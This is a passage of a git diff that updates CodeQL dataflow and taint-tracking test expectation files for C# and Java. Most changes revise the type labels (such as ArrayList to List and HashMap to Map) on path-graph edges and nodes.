: B [field FieldB] : Object | provenance | | +| H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | provenance | | +| H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | H.cs:165:17:165:27 | (...) ... : B [field FieldB] : Object | provenance | | | H.cs:167:14:167:14 | access to local variable b : B [field FieldB] : Object | H.cs:167:14:167:21 | access to field FieldB | provenance | | | H.cs:167:14:167:14 | access to local variable b : B [field FieldB] : Object | H.cs:167:14:167:21 | access to field FieldB | provenance | | | I.cs:5:12:5:12 | this [Return] : I [field Field1] : Object | I.cs:21:13:21:19 | object creation of type I : I [field Field1] : Object | provenance | | 
@@ -2033,8 +2033,8 @@ nodes | H.cs:106:26:106:39 | (...) ... : A [field FieldA] : Object | semmle.label | (...) ... : A [field FieldA] : Object | | H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | semmle.label | access to local variable temp : B [field FieldB, field FieldA] : Object | | H.cs:106:29:106:32 | access to local variable temp : B [field FieldB, field FieldA] : Object | semmle.label | access to local variable temp : B [field FieldB, field FieldA] : Object | -| H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | semmle.label | access to field FieldB : A [field FieldA] : Object | -| H.cs:106:29:106:39 | access to field FieldB : A [field FieldA] : Object | semmle.label | access to field FieldB : A [field FieldA] : Object | +| H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | semmle.label | access to field FieldB : Object [field FieldA] : Object | +| H.cs:106:29:106:39 | access to field FieldB : Object [field FieldA] : Object | semmle.label | access to field FieldB : Object [field FieldA] : Object | | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | semmle.label | [post] access to local variable a : A [field FieldA] : Object | | H.cs:112:9:112:9 | [post] access to local variable a : A [field FieldA] : Object | semmle.label | [post] access to local variable a : A [field FieldA] : Object | | H.cs:112:20:112:36 | call to method Source : Object | semmle.label | call to method Source : Object | 
@@ -2133,8 +2133,8 @@ nodes | H.cs:165:20:165:20 | access to local variable a : A [field FieldA] : B | semmle.label | access to local variable a : A [field FieldA] : B | | H.cs:165:20:165:27 | access to field FieldA : B | semmle.label | access to field FieldA : B | | H.cs:165:20:165:27 | access to field FieldA : B | semmle.label | access to field FieldA : B | -| H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | semmle.label | access to field FieldA : B [field FieldB] : Object | -| H.cs:165:20:165:27 | access to field FieldA : B [field FieldB] : Object | semmle.label | access to field FieldA : B [field FieldB] : Object | +| H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | semmle.label | access to field FieldA : Object [field FieldB] : Object | +| H.cs:165:20:165:27 | access to field FieldA : Object [field FieldB] : Object | semmle.label | access to field FieldA : Object [field FieldB] : Object | | H.cs:166:14:166:14 | access to local variable b | semmle.label | access to local variable b | | H.cs:166:14:166:14 | access to local variable b | semmle.label | access to local variable b | | H.cs:167:14:167:14 | access to local variable b : B [field FieldB] : Object | semmle.label | access to local variable b : B [field FieldB] : Object | diff --git a/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected b/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected index 74c1c62de1f..c5f00cd656f 100644 --- a/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected +++ b/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected 
@@ -136,8 +136,8 @@ edges | Capture.cs:334:9:334:30 | access to local function CapturingLocalFunction : CapturingLocalFunction [captured x] : String | Capture.cs:332:42:332:62 | access to local function CapturedLocalFunction : CapturedLocalFunction [captured x] : String | provenance | | | Capture.cs:339:17:339:30 | "taint source" : String | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | provenance | | | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | provenance | | -| Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | Capture.cs:341:45:341:45 | access to local variable x | provenance | | -| Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | provenance | | +| Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | Capture.cs:341:45:341:45 | access to local variable x | provenance | | +| Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured s] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured s] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured sink39] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... 
[captured sink39] : String | provenance | | @@ -639,7 +639,7 @@ nodes | Capture.cs:339:17:339:30 | "taint source" : String | semmle.label | "taint source" : String | | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | semmle.label | (...) => ... : (...) => ... [captured x] : String | | Capture.cs:341:45:341:45 | access to local variable x | semmle.label | access to local variable x | -| Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | semmle.label | access to local variable capturedLambda : (...) => ... [captured x] : String | +| Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | semmle.label | access to local variable capturedLambda : Action [captured x] : String | | Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | semmle.label | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | | Capture.cs:350:34:350:34 | a : (...) => ... [captured s] : String | semmle.label | a : (...) => ... [captured s] : String | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | semmle.label | a : (...) => ... [captured sink39] : String | diff --git a/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected b/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected index 1d05b0ae55e..f90f71d1ea9 100644 --- a/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected +++ b/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected 
@@ -146,8 +146,8 @@ edges | Capture.cs:334:9:334:30 | access to local function CapturingLocalFunction : CapturingLocalFunction [captured x] : String | Capture.cs:332:42:332:62 | access to local function CapturedLocalFunction : CapturedLocalFunction [captured x] : String | provenance | | | Capture.cs:339:17:339:30 | "taint source" : String | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | provenance | | | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | provenance | | -| Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | Capture.cs:341:45:341:45 | access to local variable x | provenance | | -| Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | provenance | | +| Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | Capture.cs:341:45:341:45 | access to local variable x | provenance | | +| Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured s] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured s] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... [captured sink39] : String | provenance | | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | Capture.cs:352:9:352:9 | access to parameter a : (...) => ... 
[captured sink39] : String | provenance | | @@ -709,7 +709,7 @@ nodes | Capture.cs:339:17:339:30 | "taint source" : String | semmle.label | "taint source" : String | | Capture.cs:341:33:341:46 | (...) => ... : (...) => ... [captured x] : String | semmle.label | (...) => ... : (...) => ... [captured x] : String | | Capture.cs:341:45:341:45 | access to local variable x | semmle.label | access to local variable x | -| Capture.cs:343:40:343:53 | access to local variable capturedLambda : (...) => ... [captured x] : String | semmle.label | access to local variable capturedLambda : (...) => ... [captured x] : String | +| Capture.cs:343:40:343:53 | access to local variable capturedLambda : Action [captured x] : String | semmle.label | access to local variable capturedLambda : Action [captured x] : String | | Capture.cs:345:9:345:23 | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | semmle.label | access to local variable capturingLambda : Action [captured capturedLambda, captured x] : String | | Capture.cs:350:34:350:34 | a : (...) => ... [captured s] : String | semmle.label | a : (...) => ... [captured s] : String | | Capture.cs:350:34:350:34 | a : (...) => ... [captured sink39] : String | semmle.label | a : (...) => ... [captured sink39] : String | diff --git a/java/ql/test/library-tests/dataflow/capture/inlinetest.expected b/java/ql/test/library-tests/dataflow/capture/inlinetest.expected index efd347890dd..d127b92ddaf 100644 --- a/java/ql/test/library-tests/dataflow/capture/inlinetest.expected +++ b/java/ql/test/library-tests/dataflow/capture/inlinetest.expected 
@@ -12,12 +12,12 @@ edges | B.java:13:5:13:6 | l1 : ArrayList [] : String | B.java:13:16:13:16 | e : String | provenance | MaD:1 | | B.java:13:5:13:6 | l1 : ArrayList [] : String | B.java:13:16:13:29 | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | provenance | MaD:1 | | B.java:13:16:13:16 | e : String | B.java:13:28:13:28 | e : String | provenance | | -| B.java:13:16:13:29 | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | B.java:13:16:13:29 | List l2 : ArrayList [] : String | provenance | | -| B.java:13:16:13:29 | List l2 : ArrayList [] : String | B.java:14:10:14:11 | l2 : ArrayList [] : String | provenance | | +| B.java:13:16:13:29 | ...->... [post update] : new Consumer(...) { ... } [List l2, ] : String | B.java:13:16:13:29 | List l2 : List [] : String | provenance | | +| B.java:13:16:13:29 | List l2 : List [] : String | B.java:14:10:14:11 | l2 : List [] : String | provenance | | | B.java:13:21:13:22 | l2 [post update] : ArrayList [] : String | B.java:13:21:13:22 | this : new Consumer(...) { ... } [List l2, ] : String | provenance | | | B.java:13:21:13:22 | this : new Consumer(...) { ... } [List l2, ] : String | B.java:13:16:13:29 | parameter this [Return] : new Consumer(...) { ... } [List l2, ] : String | provenance | | | B.java:13:28:13:28 | e : String | B.java:13:21:13:22 | l2 [post update] : ArrayList [] : String | provenance | MaD:2 | -| B.java:14:10:14:11 | l2 : ArrayList [] : String | B.java:14:10:14:18 | get(...) | provenance | MaD:3 | +| B.java:14:10:14:11 | l2 : List [] : String | B.java:14:10:14:18 | get(...) | provenance | MaD:3 | | B.java:22:26:22:26 | x : String | B.java:22:68:22:68 | x : String | provenance | | | B.java:22:56:22:60 | other [post update] : B [bf1] : String | B.java:22:56:22:60 | this : new Consumer(...) { ... } [B other, bf1] : String | provenance | | | B.java:22:56:22:60 | this : new Consumer(...) { ... 
} [B other, bf1] : String | B.java:22:26:22:71 | parameter this [Return] : new Consumer(...) { ... } [B other, bf1] : String | provenance | | @@ -33,10 +33,10 @@ edges | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:18:39:20 | key : String | provenance | MaD:4 | | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | provenance | MaD:5 | | B.java:39:5:39:7 | inp : HashMap [] : String | B.java:39:23:39:27 | value : String | provenance | MaD:5 | -| B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | out : HashMap [] : String | provenance | | -| B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | out : HashMap [] : String | provenance | | -| B.java:39:17:39:56 | out : HashMap [] : String | B.java:38:48:38:70 | out [Return] : HashMap [] : String | provenance | | -| B.java:39:17:39:56 | out : HashMap [] : String | B.java:38:48:38:70 | out [Return] : HashMap [] : String | provenance | | +| B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | out : Map [] : String | provenance | | +| B.java:39:17:39:56 | ...->... [post update] : new BiConsumer(...) { ... } [out, ] : String | B.java:39:17:39:56 | out : Map [] : String | provenance | | +| B.java:39:17:39:56 | out : Map [] : String | B.java:38:48:38:70 | out [Return] : Map [] : String | provenance | | +| B.java:39:17:39:56 | out : Map [] : String | B.java:38:48:38:70 | out [Return] : Map [] : String | provenance | | | B.java:39:18:39:20 | key : String | B.java:39:43:39:45 | key : String | provenance | | | B.java:39:23:39:27 | value : String | B.java:39:48:39:52 | value : String | provenance | | | B.java:39:35:39:37 | out [post update] : HashMap [] : String | B.java:39:35:39:37 | this : new BiConsumer(...) { ... } [out, ] : String | provenance | | 
@@ -94,30 +94,30 @@ edges | B.java:103:5:103:6 | l2 [post update] : ArrayList [, ] : String | B.java:107:5:107:6 | l2 : ArrayList [, ] : String | provenance | | | B.java:103:12:103:13 | l1 : ArrayList [] : String | B.java:103:5:103:6 | l2 [post update] : ArrayList [, ] : String | provenance | MaD:2 | | B.java:104:16:104:32 | source(...) : String | B.java:107:16:111:6 | String s : String | provenance | | -| B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:107:16 | l : ArrayList [] : String | provenance | MaD:1 | +| B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:107:16 | l : List [] : String | provenance | MaD:1 | | B.java:107:5:107:6 | l2 : ArrayList [, ] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | provenance | MaD:1 | -| B.java:107:16:107:16 | l : ArrayList [] : String | B.java:107:21:107:21 | l : ArrayList [] : String | provenance | | +| B.java:107:16:107:16 | l : List [] : String | B.java:107:21:107:21 | l : List [] : String | provenance | | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | provenance | MaD:1 | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | provenance | heuristic-callback | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | provenance | MaD:1 | | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | provenance | heuristic-callback | -| B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... 
} [List out1, ] : String | B.java:107:16:111:6 | List out1 : ArrayList [] : String | provenance | | -| B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | B.java:107:16:111:6 | List out2 : ArrayList [] : String | provenance | | -| B.java:107:16:111:6 | List out1 : ArrayList [] : String | B.java:112:10:112:13 | out1 : ArrayList [] : String | provenance | | -| B.java:107:16:111:6 | List out2 : ArrayList [] : String | B.java:113:10:113:13 | out2 : ArrayList [] : String | provenance | | +| B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out1, ] : String | B.java:107:16:111:6 | List out1 : List [] : String | provenance | | +| B.java:107:16:111:6 | ...->... [post update] : new Consumer>(...) { ... } [List out2, ] : String | B.java:107:16:111:6 | List out2 : List [] : String | provenance | | +| B.java:107:16:111:6 | List out1 : List [] : String | B.java:112:10:112:13 | out1 : List [] : String | provenance | | +| B.java:107:16:111:6 | List out2 : List [] : String | B.java:113:10:113:13 | out2 : List [] : String | provenance | | | B.java:107:16:111:6 | String s : String | B.java:107:16:111:6 | ...->... : new Consumer>(...) { ... } [String s] : String | provenance | | | B.java:107:16:111:6 | parameter this : new Consumer>(...) { ... } [String s] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [String s] : String | provenance | | -| B.java:107:21:107:21 | l : ArrayList [] : String | B.java:107:31:107:31 | x : String | provenance | MaD:1 | -| B.java:107:21:107:21 | l : ArrayList [] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | provenance | MaD:1 | +| B.java:107:21:107:21 | l : List [] : String | B.java:107:31:107:31 | x : String | provenance | MaD:1 | +| B.java:107:21:107:21 | l : List [] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... 
} [List out1, ] : String | provenance | MaD:1 | | B.java:107:31:107:31 | x : String | B.java:109:16:109:16 | x : String | provenance | | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | provenance | MaD:1 | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | provenance | heuristic-callback | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | provenance | MaD:1 | | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | provenance | heuristic-callback | -| B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | B.java:107:31:111:5 | List out1 : ArrayList [] : String | provenance | | -| B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out2, ] : String | B.java:107:31:111:5 | List out2 : ArrayList [] : String | provenance | | -| B.java:107:31:111:5 | List out1 : ArrayList [] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [List out1, ] : String | provenance | | -| B.java:107:31:111:5 | List out2 : ArrayList [] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [List out2, ] : String | provenance | | +| B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... } [List out1, ] : String | B.java:107:31:111:5 | List out1 : List [] : String | provenance | | +| B.java:107:31:111:5 | ...->... [post update] : new Consumer(...) { ... 
} [List out2, ] : String | B.java:107:31:111:5 | List out2 : List [] : String | provenance | | +| B.java:107:31:111:5 | List out1 : List [] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [List out1, ] : String | provenance | | +| B.java:107:31:111:5 | List out2 : List [] : String | B.java:107:31:111:5 | this : new Consumer>(...) { ... } [List out2, ] : String | provenance | | | B.java:107:31:111:5 | String s : String | B.java:107:31:111:5 | ...->... : new Consumer(...) { ... } [String s] : String | provenance | | | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | B.java:108:12:108:12 | this : new Consumer(...) { ... } [String s] : String | provenance | | | B.java:107:31:111:5 | parameter this : new Consumer(...) { ... } [String s] : String | B.java:110:16:110:16 | this : new Consumer(...) { ... } [String s] : String | provenance | | 
@@ -132,8 +132,8 @@ edges | B.java:110:7:110:10 | this : new Consumer(...) { ... } [List out2, ] : String | B.java:107:31:111:5 | parameter this [Return] : new Consumer(...) { ... } [List out2, ] : String | provenance | | | B.java:110:16:110:16 | s : String | B.java:110:7:110:10 | out2 [post update] : ArrayList [] : String | provenance | MaD:2 | | B.java:110:16:110:16 | this : new Consumer(...) { ... } [String s] : String | B.java:110:16:110:16 | s : String | provenance | | -| B.java:112:10:112:13 | out1 : ArrayList [] : String | B.java:112:10:112:20 | get(...) | provenance | MaD:3 | -| B.java:113:10:113:13 | out2 : ArrayList [] : String | B.java:113:10:113:20 | get(...) | provenance | MaD:3 | +| B.java:112:10:112:13 | out1 : List [] : String | B.java:112:10:112:20 | get(...) | provenance | MaD:3 | +| B.java:113:10:113:13 | out2 : List [] : String | B.java:113:10:113:20 | get(...) | provenance | MaD:3 | | B.java:126:19:126:22 | parameter this [Return] : new TwoRuns(...) { ... } [List l1, ] : String | B.java:136:5:136:5 | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | | B.java:127:9:127:10 | l1 [post update] : ArrayList [] : String | B.java:127:9:127:10 | this : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | | B.java:127:9:127:10 | this : new TwoRuns(...) { ... } [List l1, ] : String | B.java:126:19:126:22 | parameter this [Return] : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | 
@@ -144,14 +144,14 @@ edges | B.java:131:16:131:17 | l1 : ArrayList [] : String | B.java:131:16:131:24 | get(...) : String | provenance | MaD:3 | | B.java:131:16:131:17 | this : new TwoRuns(...) { ... } [List l1, ] : String | B.java:131:16:131:17 | l1 : ArrayList [] : String | provenance | | | B.java:131:16:131:24 | get(...) : String | B.java:131:9:131:10 | l2 [post update] : ArrayList [] : String | provenance | MaD:2 | -| B.java:136:5:136:5 | List l1 : ArrayList [] : String | B.java:137:5:137:5 | List l1 : ArrayList [] : String | provenance | | -| B.java:136:5:136:5 | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | B.java:136:5:136:5 | List l1 : ArrayList [] : String | provenance | | -| B.java:137:5:137:5 | List l1 : ArrayList [] : String | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | -| B.java:137:5:137:5 | List l2 : ArrayList [] : String | B.java:138:10:138:11 | l2 : ArrayList [] : String | provenance | | +| B.java:136:5:136:5 | List l1 : List [] : String | B.java:137:5:137:5 | List l1 : List [] : String | provenance | | +| B.java:136:5:136:5 | r [post update] : new TwoRuns(...) { ... } [List l1, ] : String | B.java:136:5:136:5 | List l1 : List [] : String | provenance | | +| B.java:137:5:137:5 | List l1 : List [] : String | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | +| B.java:137:5:137:5 | List l2 : List [] : String | B.java:138:10:138:11 | l2 : List [] : String | provenance | | | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | B.java:130:19:130:22 | parameter this : new TwoRuns(...) { ... } [List l1, ] : String | provenance | | | B.java:137:5:137:5 | r : new TwoRuns(...) { ... } [List l1, ] : String | B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | provenance | MaD:3 | -| B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... 
} [List l2, ] : String | B.java:137:5:137:5 | List l2 : ArrayList [] : String | provenance | | -| B.java:138:10:138:11 | l2 : ArrayList [] : String | B.java:138:10:138:18 | get(...) | provenance | MaD:3 | +| B.java:137:5:137:5 | r [post update] : new TwoRuns(...) { ... } [List l2, ] : String | B.java:137:5:137:5 | List l2 : List [] : String | provenance | | +| B.java:138:10:138:11 | l2 : List [] : String | B.java:138:10:138:18 | get(...) | provenance | MaD:3 | | B.java:142:16:142:31 | source(...) : String | B.java:148:17:148:29 | String s : String | provenance | | | B.java:145:7:145:13 | parameter this : MyLocal [String s] : String | B.java:145:28:145:28 | this : MyLocal [String s] : String | provenance | | | B.java:145:19:145:22 | this [post update] : MyLocal [f] : String | B.java:145:7:145:13 | parameter this [Return] : MyLocal [f] : String | provenance | | 
@@ -204,11 +204,11 @@ edges | B.java:175:5:175:6 | String s2 : String | B.java:175:5:175:6 | m1 : MyLocal [String s2] : String | provenance | | | B.java:175:5:175:6 | m1 : MyLocal [String s2] : String | B.java:162:12:162:15 | parameter this : MyLocal [String s2] : String | provenance | | | B.java:175:5:175:6 | m1 : MyLocal [f] : String | B.java:162:12:162:15 | parameter this : MyLocal [f] : String | provenance | | -| B.java:177:5:177:6 | List l : ArrayList [] : String | B.java:178:10:178:11 | List l : ArrayList [] : String | provenance | | -| B.java:177:5:177:6 | m1 [post update] : MyLocal [List l, ] : String | B.java:177:5:177:6 | List l : ArrayList [] : String | provenance | | +| B.java:177:5:177:6 | List l : List [] : String | B.java:178:10:178:11 | List l : List [] : String | provenance | | +| B.java:177:5:177:6 | m1 [post update] : MyLocal [List l, ] : String | B.java:177:5:177:6 | List l : List [] : String | provenance | | | B.java:177:12:177:27 | source(...) : String | B.java:166:16:166:23 | s : String | provenance | | | B.java:177:12:177:27 | source(...) : String | B.java:177:5:177:6 | m1 [post update] : MyLocal [List l, ] : String | provenance | MaD:2 | -| B.java:178:10:178:11 | List l : ArrayList [] : String | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | provenance | | +| B.java:178:10:178:11 | List l : List [] : String | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | provenance | | | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | B.java:169:14:169:16 | parameter this : MyLocal [List l, ] : String | provenance | | | B.java:178:10:178:11 | m2 : MyLocal [List l, ] : String | B.java:178:10:178:17 | get(...) | provenance | MaD:3 | | B.java:203:16:203:42 | source(...) : String | B.java:212:5:212:6 | String s : String | provenance | | 
@@ -220,17 +220,17 @@ edges | B.java:207:15:207:42 | source(...) : String | B.java:207:7:207:9 | out [post update] : ArrayList [] : String | provenance | MaD:2 | | B.java:209:19:211:5 | parameter this : new Runnable(...) { ... } [String s] : String | B.java:210:7:210:8 | this : new Runnable(...) { ... } [String s] : String | provenance | | | B.java:209:19:211:5 | parameter this [Return] : new Runnable(...) { ... } [List out, ] : String | B.java:212:5:212:6 | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | provenance | | -| B.java:210:7:210:8 | List out : ArrayList [] : String | B.java:210:7:210:8 | this : new Runnable(...) { ... } [List out, ] : String | provenance | | +| B.java:210:7:210:8 | List out : List [] : String | B.java:210:7:210:8 | this : new Runnable(...) { ... } [List out, ] : String | provenance | | | B.java:210:7:210:8 | String s : String | B.java:210:7:210:8 | r1 : new Runnable(...) { ... } [String s] : String | provenance | | | B.java:210:7:210:8 | r1 : new Runnable(...) { ... } [String s] : String | B.java:205:19:208:5 | parameter this : new Runnable(...) { ... } [String s] : String | provenance | | -| B.java:210:7:210:8 | r1 [post update] : new Runnable(...) { ... } [List out, ] : String | B.java:210:7:210:8 | List out : ArrayList [] : String | provenance | | +| B.java:210:7:210:8 | r1 [post update] : new Runnable(...) { ... } [List out, ] : String | B.java:210:7:210:8 | List out : List [] : String | provenance | | | B.java:210:7:210:8 | this : new Runnable(...) { ... } [List out, ] : String | B.java:209:19:211:5 | parameter this [Return] : new Runnable(...) { ... } [List out, ] : String | provenance | | | B.java:210:7:210:8 | this : new Runnable(...) { ... 
} [String s] : String | B.java:210:7:210:8 | String s : String | provenance | | -| B.java:212:5:212:6 | List out : ArrayList [] : String | B.java:213:10:213:12 | out : ArrayList [] : String | provenance | | +| B.java:212:5:212:6 | List out : List [] : String | B.java:213:10:213:12 | out : List [] : String | provenance | | | B.java:212:5:212:6 | String s : String | B.java:212:5:212:6 | r2 : new Runnable(...) { ... } [String s] : String | provenance | | | B.java:212:5:212:6 | r2 : new Runnable(...) { ... } [String s] : String | B.java:209:19:211:5 | parameter this : new Runnable(...) { ... } [String s] : String | provenance | | -| B.java:212:5:212:6 | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | B.java:212:5:212:6 | List out : ArrayList [] : String | provenance | | -| B.java:213:10:213:12 | out : ArrayList [] : String | B.java:213:10:213:19 | get(...) | provenance | MaD:3 | +| B.java:212:5:212:6 | r2 [post update] : new Runnable(...) { ... } [List out, ] : String | B.java:212:5:212:6 | List out : List [] : String | provenance | | +| B.java:213:10:213:12 | out : List [] : String | B.java:213:10:213:19 | get(...) | provenance | MaD:3 | | B.java:231:16:231:28 | source(...) : String | B.java:247:5:247:18 | String s : String | provenance | | | B.java:235:7:235:14 | parameter this : MyLocal2 [String s] : String | B.java:238:15:238:15 | this : MyLocal2 [String s] : String | provenance | | | B.java:238:9:238:9 | l [post update] : ArrayList [] : String | B.java:238:9:238:9 | this : MyLocal2 [List l, ] : String | provenance | | 
@@ -243,17 +243,17 @@ edges | B.java:241:16:241:16 | l : ArrayList [] : String | B.java:241:16:241:23 | get(...) : String | provenance | MaD:3 | | B.java:241:16:241:16 | this : MyLocal2 [List l, ] : String | B.java:241:16:241:16 | l : ArrayList [] : String | provenance | | | B.java:241:16:241:23 | get(...) : String | B.java:241:9:241:10 | l2 [post update] : ArrayList [] : String | provenance | MaD:2 | -| B.java:247:5:247:18 | List l2 : ArrayList [] : String | B.java:249:10:249:11 | l2 : ArrayList [] : String | provenance | | -| B.java:247:5:247:18 | List l : ArrayList [] : String | B.java:248:10:248:10 | l : ArrayList [] : String | provenance | | +| B.java:247:5:247:18 | List l2 : List [] : String | B.java:249:10:249:11 | l2 : List [] : String | provenance | | +| B.java:247:5:247:18 | List l : List [] : String | B.java:248:10:248:10 | l : List [] : String | provenance | | | B.java:247:5:247:18 | String s : String | B.java:247:5:247:18 | new MyLocal2(...) [pre constructor] : MyLocal2 [String s] : String | provenance | | | B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | B.java:240:12:240:14 | parameter this : MyLocal2 [List l, ] : String | provenance | | -| B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | B.java:247:5:247:18 | List l : ArrayList [] : String | provenance | | +| B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | B.java:247:5:247:18 | List l : List [] : String | provenance | | | B.java:247:5:247:18 | new MyLocal2(...) : MyLocal2 [List l, ] : String | B.java:247:5:247:18 | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | provenance | MaD:3 | -| B.java:247:5:247:18 | new MyLocal2(...) [post update] : MyLocal2 [List l2, ] : String | B.java:247:5:247:18 | List l2 : ArrayList [] : String | provenance | | +| 